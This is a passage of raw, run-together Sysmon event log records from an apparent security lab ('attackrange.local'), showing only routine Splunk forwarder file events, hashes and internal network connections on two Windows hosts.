Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A5EC4BA652D453C34EDA92743867387,SHA256=CAA91A3D2FE64BD7E901C79A7E90FC0C194EEC3A597CD74BACCABFBD11304742falsetrue 23542300x800000000000000021219311Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:23.627{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B8D6EBA130FDC0F05C0517BF031B7F1,SHA256=7A1358F19BF306C5BFB7AA8ED2F7AE8BB4CA0E32EFB6F25DDE7530C015DB9D51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344489Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:23.555{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344488Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:23.555{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B32D3FB81BE600EB6CF6D9B8DB9D9A17,SHA256=764F0A5879E21E7CC2372E84BDC96FD3BC901066EF4A2633BC0DC9DD0B9EF657falsetrue 11241100x800000000000000057344487Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:23.040{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344486Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:23.040{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42EB4AA6AD9EDF7BFE1D537F0A5AF47D,SHA256=EC62E40E7AB89E4BDA716858037E6BFE8C8F62EF295116F91B1BBC2BD62C0575falsetrue 23542300x800000000000000021219312Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:24.627{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=304B795D520C802A5DA1E1D5BE68B139,SHA256=D1FEEF0D8E9D4F7FF1D4B5F0F54E1C512618DBA8145860A430E364A84A05D3C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344491Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:24.055{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344490Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:24.055{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=462581D478488F3C1EDE8F4AA1DC919F,SHA256=FBD28D4AD4D49693E20055A12471643BEE18406DBF6159CA91CD921D5541EC8Cfalsetrue 23542300x800000000000000021219314Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:25.658{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=734002B42A0A3EC2D189DE1E8FC9C3C9,SHA256=E2C645D7F0E3183F0CF094476022FADCE2ECB823BB5A75DE1FFE126F0A9EEA6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344493Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:25.074{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344492Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:25.074{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31B1B6F8B0EF5367D4D978B5132D3D81,SHA256=4F75D3B97912C893C48DF003A522D56C9DF61A62F4C7F131C736662608FA7B08falsetrue 10341000x800000000000000021219313Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:25.017{AD5E2759-5433-6143-0D00-00000000F101}7923680C:\Windows\system32\svchost.exe{AD5E2759-5433-6143-1C00-00000000F101}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219317Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:26.658{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8F8C6BB378DE68D2D5E4814A1EB9908,SHA256=824B98B0410E60DE6AD6D5E980FAD60CF0BBB8F8860EE1FF4F5CB4725AF4851F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057344498Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:57.473{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54515-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057344497Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:26.142{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344496Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:26.142{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8559A14C71A6AFE42DCD2E9660EB5AF6,SHA256=87BD38559FC657A34E03C58FBA0C8EFFDCB4FF3757A228BC56477D43F51C648Afalsetrue 11241100x800000000000000057344495Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:26.104{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344494Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:26.104{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43C166B300537D19E96E7C2E050C7310,SHA256=97F09CE9B09F4FF2C4B2207BF20375A68A4B0130B080804EDDF6411D584237CAfalsetrue 23542300x800000000000000021219316Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:26.111{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=990161C235A5D894473AB315A605D7E5,SHA256=CC3BCC1AAB10563D8C903787936C8CB64796292716A400976116D412CEC8BE0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219315Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:26.111{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07D9C24CB56B17336116C84A2696FEE7,SHA256=356EBA85E1E3AB29420B816EAEFDEF8F2AA93691868B18F7A8515E9A90880FD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219319Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:27.673{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54887B3D7ACAE41786B69BDB58A80AF6,SHA256=82979806402702D303AF8FBD00AA935453D6FB30DC0224CF3BF329F1B48DB9B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344500Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:27.125{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344499Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:27.124{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AD2C22205BFA7182459695E3A56F475,SHA256=0DC5BDF0CD976E97EC01C5CD6BA12C3F57972D6945B189CED8D2430697A3DCEDfalsetrue 354300x800000000000000021219318Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:13.514{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64302-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219320Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:28.673{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E36F07A127CE2227D9B6B64A762F8EFC,SHA256=B94360CCAD909177035C518E2DF49FAAE8AD9AD4B1834A58FEBE5789E473B873,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344504Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:28.555{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344503Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:28.555{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05E24844881CF47453E368329EC12F31,SHA256=0B9E03B84F10AF6ABAD166D1AC85A182D10C690550D11E1001EC899A543AAF79falsetrue 11241100x800000000000000057344502Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:28.140{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344501Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:28.140{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15A3E78BCD772595EE17C9A21D190915,SHA256=5F643E186C7CDBD9A09BCC486AB48AC109C18B2C0F6949672520B7C15F3639D5falsetrue 23542300x800000000000000021219321Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:29.673{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E0AEAF92ADA659A84668CA9E31A8A73,SHA256=909C07EF81D307D88D66D53B0CFE7CCF577900671EACF3A909ACE6D8D5B7964F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344506Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:29.155{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344505Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:29.155{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B3346FBC0D0172109F2A74314A573C7,SHA256=73DAEBBF2D99429F62155263F0EAE196018582BCEBDEE7B232CE0D992EFF60F3falsetrue 23542300x800000000000000021219322Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:30.689{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECF6485368CBFA6B0340323696D84688,SHA256=CD895EBF70C92EEF8530C922E5D1B158059619972EF83033C715DD866EBEBA54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344508Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:30.170{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344507Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:30.170{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF73B4B387B3B61D6D113DDAFE7F6A06,SHA256=AD1856AB03D18941550B89DE15695B656EC185CE4FA2BE060A0D3779160F8A37falsetrue 23542300x800000000000000021219323Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:31.689{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A074B0CD6DDB8580699B1B868F5CE62E,SHA256=86022F616C46380CA42CF56B2953B8AA737C638575B8CB56BD05E93BC6E83160,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344512Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:31.201{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344511Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:31.201{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEE39DD27615C3D3F54175338603FA55,SHA256=D56A3F3DF8B2C007136AEDCBFE6004CA344F4A74641A389F2CEF6E82CA0BC13Bfalsetrue 11241100x800000000000000057344510Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:31.154{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344509Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:31.154{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3A9A43C4C0227398FF1322E2102DE33,SHA256=829837C4F92164344D34760BE65871A21CE021FD7C9A80EA417F70436F6AFC87falsetrue 23542300x800000000000000021219327Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:32.689{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02B034E3F1334F2239B209331A71E2EB,SHA256=EBC977B88D466D3337DFC002A4F7C7C58B87BC23F834058F362B07F2FFF77328,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344517Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:32.918{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344516Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:32.918{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50657E4C95564F08A3EFDDA083E71E57,SHA256=B360E7C5614A7B24EF01C7CE82F4A591AEF042B5C085BF8F5A98BFD8C09BC7B8falsetrue 11241100x800000000000000057344515Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:32.219{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344514Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:32.219{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=763535E341B218F98ADF7AE375B63C85,SHA256=3622FA6A6A6AE52050B520DB715F36F6B7B264F935D432925B752E90687634B8falsetrue 354300x800000000000000021219326Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:19.467{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64303-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219325Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:32.064{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACEECBF68BAB30261431F4166B636BD3,SHA256=D8613C650ED46D8F7F71230A4127CA16A9973222050E3C74FBB43F1F079BAFC5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219324Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:32.064{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=990161C235A5D894473AB315A605D7E5,SHA256=CC3BCC1AAB10563D8C903787936C8CB64796292716A400976116D412CEC8BE0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057344513Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:02.491{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54516-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219328Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:33.689{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA09F64CD882F57402CAB7062714E851,SHA256=DBEC7D8EEBE82ED0E95B45751F34FA68FF67BA528836A4D6293E590E6301260A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344519Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:33.268{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344518Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:33.268{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E752EC45967FCA1FC176CF9EE6ACCB2B,SHA256=331EE0E904D3A10E504C93350B3A77D22D672C7868F7E301D6FB43518489221Ffalsetrue 23542300x800000000000000021219329Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:34.689{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48E790F7185BFCA38803D718162673D3,SHA256=93F3AB0D7439D51BC693EAD344385A20112CFD8BD3EFC1758D5842E86ED71BFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344521Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:34.283{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344520Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:34.283{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEAB338E139EED3152F1527D50497577,SHA256=8FE3EF0B453DAA254A54B2EF7504DDAA7573584DC061B14CD5357D01743B30F7falsetrue 23542300x800000000000000021219330Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:35.689{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33BFE72A9619D8F3A59D2BB455CE5EF,SHA256=92637DDA4FCA6996FBBB3347BE8B0B4F82E33C11BC2A9DB9B1F253C5A64D6572,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344523Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:35.299{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344522Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:35.299{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program 